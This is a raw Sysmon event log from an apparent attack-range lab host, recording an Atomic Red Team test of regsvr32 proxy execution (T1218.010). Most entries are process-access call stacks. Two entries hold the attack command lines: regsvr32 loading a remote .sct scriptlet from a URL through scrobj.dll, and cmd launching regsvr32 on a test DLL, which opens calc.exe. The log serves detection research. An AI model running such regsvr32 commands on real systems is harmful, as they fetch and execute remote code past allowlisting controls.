10341000x8000000000000000360444Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.984{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+10225|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360443Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.984{8e433fbf-3378-6013-6702-000000001100}29326892C:\Windows\system32\csrss.exe{8e433fbf-36df-6013-a203-000000001100}7256C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\basesrv.DLL+2fba|C:\Windows\SYSTEM32\CSRSRV.dll+5af4|C:\Windows\SYSTEM32\ntdll.dll+6cedf
10341000x8000000000000000360442Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.984{8e433fbf-3433-6013-2203-000000001100}66805812C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{8e433fbf-36df-6013-a203-000000001100}7256C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9d934|C:\Windows\System32\KERNELBASE.dll+5f32a|C:\Windows\System32\KERNELBASE.dll+5bcc6|C:\Windows\System32\KERNEL32.DLL+1be93|UNKNOWN(00007FFC8EF99C27)
154100x8000000000000000360441Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.981{8e433fbf-36df-6013-a203-000000001100}7256C:\Windows\System32\cmd.exe10.0.18362.1 (WinBuild.160101.0800)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c "IF "%%PROCESSOR_ARCHITECTURE%%"=="AMD64" (C:\Windows\syswow64\regsvr32.exe /s C:\AtomicRedTeam\atomics\T1218.010\bin\AllTheThingsx86.dll) ELSE ( C:\Windows\system32\regsvr32.exe /s C:\AtomicRedTeam\atomics\T1218.010\bin\AllTheThingsx86.dll )" C:\Users\ADMINI~1\AppData\Local\Temp\IP-0A000111\Administrator{8e433fbf-337a-6013-b5aa-3d0000000000}0x3daab52HighMD5=9D59442313565C2E0860B88BF32B2277,SHA256=D0CEB18272966AB62B8EDFF100E9B4A6A3CB5DC0F2A32B2B18721FEA2D9C09A5,IMPHASH=272245E2988E1E430500B852C4FB5E18{8e433fbf-3433-6013-2203-000000001100}6680C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
10341000x8000000000000000360440Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.984{8e433fbf-2a44-6013-1100-000000001100}11166060C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a003-000000001100}1312C:\Windows\system32\svchost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|c:\windows\system32\rpcss.dll+32369|c:\windows\system32\rpcss.dll+319fb|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+1451a|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360439Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.984{8e433fbf-2a44-6013-0e00-000000001100}71211220C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a003-000000001100}1312C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\rpcss.dll+46b32|c:\windows\system32\rpcss.dll+46af3|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+1451a|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
13241300x8000000000000000360438Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-SetValue2021-01-28 22:12:47.968{8e433fbf-3433-6013-2203-000000001100}6680C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-1117338214-1411020952-3261875682-500\\Device\HarddiskVolume2\Windows\System32\cmd.exeBinary Data
11241100x8000000000000000360437Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.968{8e433fbf-3433-6013-2203-000000001100}6680C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-err.txt2021-01-28 22:12:47.186
11241100x8000000000000000360436Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.968{8e433fbf-3433-6013-2203-000000001100}6680C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-out.txt2021-01-28 22:12:47.186
13241300x8000000000000000360435Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-SetValue2021-01-28 22:12:47.921{8e433fbf-36df-6013-9e03-000000001100}11056C:\Windows\system32\cmd.exeHKLM\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-1117338214-1411020952-3261875682-500\\Device\HarddiskVolume2\Windows\System32\cmd.exeBinary Data
13241300x8000000000000000360434Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-SetValue2021-01-28 22:12:47.921{8e433fbf-36df-6013-9f03-000000001100}10200C:\Windows\system32\regsvr32.exeHKLM\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-1117338214-1411020952-3261875682-500\\Device\HarddiskVolume2\Windows\System32\regsvr32.exeBinary Data
10341000x8000000000000000360433Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.905{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+111b6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360432Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.905{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+106fe|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360431Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.905{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+108a0|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360430Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.905{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+10225|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360429Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.905{8e433fbf-3378-6013-6702-000000001100}29326308C:\Windows\system32\csrss.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\basesrv.DLL+2fba|C:\Windows\SYSTEM32\CSRSRV.dll+5af4|C:\Windows\SYSTEM32\ntdll.dll+6cedf
10341000x8000000000000000360428Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.905{8e433fbf-36df-6013-9f03-000000001100}1020010756C:\Windows\system32\regsvr32.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9d934|C:\Windows\System32\KERNELBASE.dll+5f32a|C:\Windows\System32\KERNELBASE.dll+5bcc6|C:\Windows\System32\KERNEL32.DLL+1be93|C:\Windows\System32\windows.storage.dll+14c4a6|C:\Windows\System32\windows.storage.dll+14ccc3|C:\Windows\System32\windows.storage.dll+14c2e8|C:\Windows\System32\windows.storage.dll+14c113|C:\Windows\System32\windows.storage.dll+14be0d|C:\Windows\System32\windows.storage.dll+13d1d8|C:\Windows\System32\windows.storage.dll+14d6dd|C:\Windows\System32\windows.storage.dll+15bf79|C:\Windows\System32\SHELL32.dll+3ec1e|C:\Windows\System32\SHELL32.dll+41755|C:\Windows\System32\SHELL32.dll+c014e|C:\Windows\System32\shcore.dll+2dce5|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
154100x8000000000000000360427Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.916{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe10.0.18362.1 (WinBuild.160101.0800)Windows CalculatorMicrosoft® Windows® Operating SystemMicrosoft CorporationCALC.EXE"C:\Windows\System32\calc.exe" C:\Users\ADMINI~1\AppData\Local\Temp\IP-0A000111\Administrator{8e433fbf-337a-6013-b5aa-3d0000000000}0x3daab52HighMD5=F88CC05134C555D4E1CD1DEF78162A9A,SHA256=A103A57D50B32469C5811E2808F021ADF9D9220093B540B8A9C83B5C821D370E,IMPHASH=8EEAA9499666119D13B3F44ECD77A729{8e433fbf-36df-6013-9f03-000000001100}10200C:\Windows\System32\regsvr32.exeC:\Windows\system32\regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct scrobj.dll
10341000x8000000000000000360426Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.905{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7e03|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+719e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7071|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+28bd|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9
10341000x8000000000000000360425Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.905{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7e03|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+719e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7071|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+28bd|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9
10341000x8000000000000000360424Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.890{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7e03|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+719e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7071|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+28bd|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9
10341000x8000000000000000360423Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.890{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9f03-000000001100}10200C:\Windows\system32\regsvr32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+2e3b5|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301
10341000x8000000000000000360422Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.890{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7e03|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+719e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7071|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+28bd|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9
10341000x8000000000000000360421Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.890{8e433fbf-337e-6013-9402-000000001100}75849716C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+2bccd|C:\Windows\System32\ApplicationFrame.dll+2bc7d|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360420Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.890{8e433fbf-337e-6013-9402-000000001100}75849716C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+2bccd|C:\Windows\System32\ApplicationFrame.dll+2bc7d|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360419Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.890{8e433fbf-337e-6013-9402-000000001100}75849716C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+1314a|C:\Windows\System32\ApplicationFrame.dll+6164|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360418Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.890{8e433fbf-337e-6013-9402-000000001100}75849716C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+1314a|C:\Windows\System32\ApplicationFrame.dll+6164|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360417Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.890{8e433fbf-337e-6013-9402-000000001100}75849716C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+13c17|C:\Windows\System32\ApplicationFrame.dll+6153|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360416Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.890{8e433fbf-337e-6013-9402-000000001100}75849716C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+13c17|C:\Windows\System32\ApplicationFrame.dll+6153|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
